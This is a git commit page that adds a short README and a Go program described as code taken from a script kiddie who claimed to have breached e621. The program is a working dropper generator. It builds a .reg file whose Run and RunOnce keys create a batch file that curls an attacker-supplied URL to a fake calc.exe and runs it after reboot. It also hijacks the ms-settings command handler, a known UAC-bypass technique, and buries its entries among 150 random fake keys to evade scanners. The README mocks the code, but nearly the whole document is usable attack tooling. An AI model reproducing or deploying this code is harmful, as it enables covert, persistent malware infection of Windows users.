reorg the tree again

Signed-off-by: Xe Iaso <me@xeiaso.net>
author: Xe Iaso <me@xeiaso.net> 2023-06-19 12:29:26 -0400
committer: Xe Iaso <me@xeiaso.net> 2023-06-19 12:35:08 -0400
commit: 65686860aedc94393d70c6b0fd1261792c492b20 (patch)
tree: 209487c2a3a23d5344c80b01e8ffbd1433c0dcfc /cmd/_skidcode/e621_reg_dropper
parent: 673f8325e2116f5645eeada3727b81f6c37982ab (diff)
download: x-65686860aedc94393d70c6b0fd1261792c492b20.tar.xz
x-65686860aedc94393d70c6b0fd1261792c492b20.zip
2 files changed, 165 insertions, 0 deletions
diff --git a/cmd/_skidcode/e621_reg_dropper/README.md b/cmd/_skidcode/e621_reg_dropper/README.md
new file mode 100644
index 0000000..e5722af
--- /dev/null
+++ b/cmd/_skidcode/e621_reg_dropper/README.md
@@ -0,0 +1,21 @@
+# `e621_reg_dropper`
+
+This is a code snippet from the script kiddie that claimed to have
+access to the database for e621. They claimed that this access would
+let them dump a database of all e621 users.
+
+After a month no such database has been released.
+
+The Go program in this folder will create a `.reg` file that
+automatically downloads and runs an arbitrary program that the
+attacker specifies. It additionally tries to cloak itself by inserting
+a bunch of garbage into the registry. The attacker-defined program
+will run when the machine reboots, allowing a gap between infection
+and activation.
+
+Somehow, these generated `.reg` files are not detected by virus
+scanners and a social engineering attack would be required to use this
+as a stage in a longer attack.
+
+This is overwhelmingly bad code though, I wouldn't let this pass in
+code reviews.
diff --git a/cmd/_skidcode/e621_reg_dropper/main.go b/cmd/_skidcode/e621_reg_dropper/main.go
new file mode 100644
index 0000000..c9b8619
--- /dev/null
+++ b/cmd/_skidcode/e621_reg_dropper/main.go
@@ -0,0 +1,144 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"log"
+	"math/rand"
+	"os"
+	"strings"
+	"time"
+)
+
+func main() {
+	commandArgs := os.Args
+	if len(commandArgs) < 3 {
+		log.Fatalf("Usage: %s <direct_link> <output> </spoofed_message> </extra_registry_keys>", commandArgs[0])
+	}
+
+	directDownloadLink := commandArgs[1]
+	outputFilename := commandArgs[2]
+
+	spoofedMessage := ""
+	generateExtraKeys := true
+
+	if len(commandArgs) == 4 {
+		spoofedMessage = commandArgs[3]
+	}
+	if len(commandArgs) == 5 {
+		spoofedMessage = commandArgs[3]
+		generateExtraKeys = (commandArgs[4] == "true")
+	}
+
+	if spoofedMessage != "" {
+		outputFilename += fmt.Sprintf("%%n%%n%s%%n%%0", spoofedMessage)
+	}
+
+	outputFilename += ".reg"
+
+	sections := make([][]string, 0)
+
+	randomIdentifier := GenerateRandomString(8)
+	secondaryRandomIdentifier := GenerateRandomString(8)
+
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\shell\\open\\command]", "(Default)=\"C:\\Windows\\System32\\cmd.exe\"", "DelegateExecute=\"\""})
+
+	cmdSequence := []string{
+		"echo @echo off",
+		fmt.Sprintf("curl %s -o %%temp%%\\calc.exe", directDownloadLink),
+		"%temp%\\calc.exe",
+		"exit",
+	}
+
+	cmdOutputStr := "cmd /c \\\"("
+	for i, command := range cmdSequence {
+		if i > 0 {
+			cmdOutputStr += " & "
+		}
+		cmdOutputStr += fmt.Sprintf("echo %s", command)
+	}
+	cmdOutputStr += fmt.Sprintf(")\\\" > %%temp%%\\%s.bat", randomIdentifier)
+
+	registryKeyStr := fmt.Sprintf("\"%s\"=\"%s\"", randomIdentifier, cmdOutputStr)
+	secondaryRegistryKeyStr := fmt.Sprintf("\"%s\"=\"cmd /c echo start /min cmd /c %%temp%%\\%s.bat >> c:\\Users\\public\\%s.bat\"", secondaryRandomIdentifier, randomIdentifier, randomIdentifier)
+
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]", registryKeyStr, secondaryRegistryKeyStr})
+
+	uacTrigger := fmt.Sprintf("\"%s\"=\"c:\\Users\\public\\%s.bat\"", randomIdentifier, randomIdentifier)
+	sections = append(sections, []string{"[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce]", uacTrigger})
+
+	fakeRegistrySections := make([][]string, 0)
+
+	if generateExtraKeys {
+		fakeRegistrySections = generateFakeRegistrySections(150)
+	}
+
+	sections = append(sections, fakeRegistrySections...)
+
+	// shuffle the sections
+	rand.Seed(time.Now().UnixNano())
+	rand.Shuffle(len(sections), func(i, j int) { sections[i], sections[j] = sections[j], sections[i] })
+
+	allLines := make([]string, 0)
+	for _, section := range sections {
+		allLines = append(allLines, section...)
+		allLines = append(allLines, "")
+	}
+
+	ioutil.WriteFile(outputFilename, []byte("Windows Registry Editor Version 5.00\r\n"+strings.Join(allLines, "\r\n")), 0644)
+}
+
+func GenerateRandomString(length int) string {
+	const charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
+	rand.Seed(time.Now().UnixNano())
+
+	result := make([]byte, length)
+	for index := range result {
+		result[index] = charset[rand.Intn(len(charset))]
+	}
+	return string(result)
+}
+
+func generateFakeRegistrySections(numSections int) [][]string {
+	fakeRegistryKeys := []string{
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\",
+		"HKEY_CURRENT_USER\\Control Panel\\Desktop\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+		"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
+		"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\CLSID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\TypeLib\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\AppID\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\",
+		"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden\\SHOWALL\\",
+	}
+
+	fakeRegistrySections := make([][]string, 0)
+
+	for i := 0; i < numSections; i++ {
+		section := []string{}
+		section = append(section, fmt.Sprintf("[%s\\%s]", fakeRegistryKeys[rand.Intn(len(fakeRegistryKeys))], GenerateRandomString(8)))
+		section = append(section, fmt.Sprintf("\"%s\"=\"%s\"", GenerateRandomString(8), GenerateRandomString(9)))
+		fakeRegistrySections = append(fakeRegistrySections, section)
+	}
+
+	return fakeRegistrySections
+}
author	Xe Iaso <me@xeiaso.net>	2023-06-19 12:29:26 -0400
committer	Xe Iaso <me@xeiaso.net>	2023-06-19 12:35:08 -0400
commit	65686860aedc94393d70c6b0fd1261792c492b20 (patch)
tree	209487c2a3a23d5344c80b01e8ffbd1433c0dcfc /cmd/_skidcode/e621_reg_dropper
parent	673f8325e2116f5645eeada3727b81f6c37982ab (diff)
download	x-65686860aedc94393d70c6b0fd1261792c492b20.tar.xz x-65686860aedc94393d70c6b0fd1261792c492b20.zip